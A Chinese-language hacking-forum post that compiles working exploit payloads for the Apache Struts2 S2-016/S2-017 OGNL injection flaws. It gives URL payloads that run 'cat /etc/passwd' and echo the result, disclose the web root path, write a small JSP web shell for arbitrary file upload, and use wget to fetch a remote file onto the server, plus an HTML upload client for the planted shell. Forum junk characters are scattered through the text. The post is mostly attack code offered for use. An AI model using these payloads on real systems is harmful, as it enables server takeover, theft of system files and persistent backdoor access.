Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。

( x4 K$ p( t9 M( c9 G喜欢就点一下感谢吧^_^
; ^1 y* b. I- B
: \2 W0 b% {" r. R- x' L带回显命令执行：
6 X0 v. t- h; i" B
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


' W" t  t5 ~1 T9 x

- b  m! y% m, c4 T- C8 X# L
: L- o$ W1 y- Z" |) z

爆路径：
* Q* H2 u8 [6 o+ W# ]
( B1 i4 ^, Z6 S: k. Phttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
7 A0 I1 z. d4 g/ E# A: L




写文件：

http://www.example.com/struts2-blank/example/X.action?redirect:${
1 C- i* K; M1 E7 h
; O- E" U$ J1 n8 g* c  z' b( O%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),

new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
. H" C( W$ N+ e& p9 T7 w+ I  \
6 Q+ i" e! u8 l$ y; R}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
0 x4 A1 k2 Q! P6 Y5 E! i# q
( g  f$ U& S! r9 C4 Y/ C1 Q

! T+ b) j" F$ e" F写入的文件内容：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
2 f" u" m( G6 C. x& _: |& \: X1 W
其实就是一个jsp的小马，需要客户端配合                                                                                 

# k% d- f1 u* }; r# O8 u函数f是文件名，t是内容
& N6 y" `* g  T& y+ Q* v
客户端：

$ H' F) A5 I8 x; B+ G0 H% L<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">

3 ^' r* ^9 @4 k. Q% A7 R<textarea name=t cols=120 rows=10 width=45>your code</textarea>

<center>
7 r" Q) }0 `; G5 Q) c9 y0 o
: C/ l+ i$ \" L5 f& P
/ T; U& M7 @) {( O: T
1 U8 L* r, B  F! J" q" i! y<input type=submit value="提交">
1 {2 U: P: j$ r2 x) c
</form>
$ R4 u9 v! ]) y$ ]$ R
0 P) g  {- ]( H* J7 ~+ t6 e' ?8 Z) ]; |就在当前目录建立一个fjp.jsp
: Z, ?6 x5 g4 t* q( u1 @
shell：http://www.example.com/struts2-blank/example/fjp.jsp


3 t, z# ?1 n6 s+ P0 y- }
, i- T5 g3 h( T4 z  K+ f还有@园长的一个客户端：

/ O1 |' b: K% ]8 j<html>
( s# n( y/ m2 v; J% u
# @: r2 a1 h6 _' ~<head>

6 m, }- S) h. r. R' _2 p8 P) \<meta http-equiv="content-type" content="text/html;charset=utf-8">
% {7 Z& P- n9 l2 I
3 @. J5 t# t# {9 K# |7 e/ y, Y<title>jsp-园长</title>

/ F: ~& i: C: ]' q; X</head>
3 p* \8 ]- ~2 |# U: ?
<style>
: N9 G5 _8 i. q/ s
4 p' `, o, d! X" L/ @( M, M.main{width:980px;height:600px;margin:0 auto;}
) K: x) Z5 }( t" M! h& p. E( z
9 g& A& ]" \* S.url{width:300px;}
/ |0 z1 c9 V9 H. |0 X4 I$ x: A; O
.fn{width:60px;}
. N5 j0 m9 j4 v( J. g
.content{width:80%;height:60%;}

</style>

<script>
- c8 f5 L# D# c' _
. |5 r2 d' T. N4 \  function upload(){
. e+ I2 l5 A2 |
    var url = document.getElementById('url').value,

      content = document.getElementById('content').value,
4 y- ^# z7 R" t% ]& v8 D9 u
  ?' ^" _- V. p& R      fileName = document.getElementById('fn').value,
. P; j; y8 z& \8 R
$ }* w* ^! e/ z1 Z" h& b: W9 M5 M& M      form = document.getElementById('fm');

  ~3 U* I  M" I1 {$ y    if(url.length == 0){
5 M5 i; o4 I" ~  c3 h- D
7 ?0 G8 T" T) h9 A8 C. j      alert("Url not allowd empty!");

* H7 h, P' a& D7 Y( p      return ;

    }

    if(content.length == 0){
8 ~) e4 F, z7 y3 h
      alert("Content not allowd empty!");

      return ;

    }
; a" g" k: Z" Y0 O% j( O0 F- }
    if(fileName.length == 0){

      alert("FileName not allowd empty!");

      return ;

    }

    form.action = url;

    form.submit();
# C; `. E' z- u9 h! w
; b4 ]" m, N; D# q# B  }

</script>
2 V* ]( F3 Z  O, T. Y$ P- C3 o
' E& l5 d) h( N2 Y5 T' A$ V4 q<body>
( H4 a6 d8 o4 O( V( c
<div class="main">
7 O" Q9 x8 y' S' d/ `! Q
  <form id="fm" method="post">  
5 O% V- x3 K& T$ o6 f1 E
  K+ H: h$ V, @/ h    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
& U$ y5 Z. _- y# a$ c
7 d( V# k4 U( X7 |9 w, ~' `  ]    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
0 p) E# S) v6 a! x
    <a href="javascript:upload();">Upload</a>
0 ?4 I& h( F3 E0 e# U; |

; f" X; I8 s( d9 O
    <textarea id="content" class="content" name="t" ></textarea>
( ~$ m- z6 Z. Y9 `  h2 z+ v1 R
  </form>

2 z5 }) ~9 d& s</div>

, b; o8 L0 _; F" g</body>
) p% d" |5 J; i/ y  I+ f: L
</html>

. U3 o; {5 S6 ~7 ^% Y1 t
, v. i8 n$ n0 X2 H4 F
$ M! _9 W2 x' R$ s& D  U2 a还有@X发的一个wget的getshell

?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

1 i* T1 F6 ]8 }' |)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
1 t. \% y1 t: X& o8 [1 s复制代码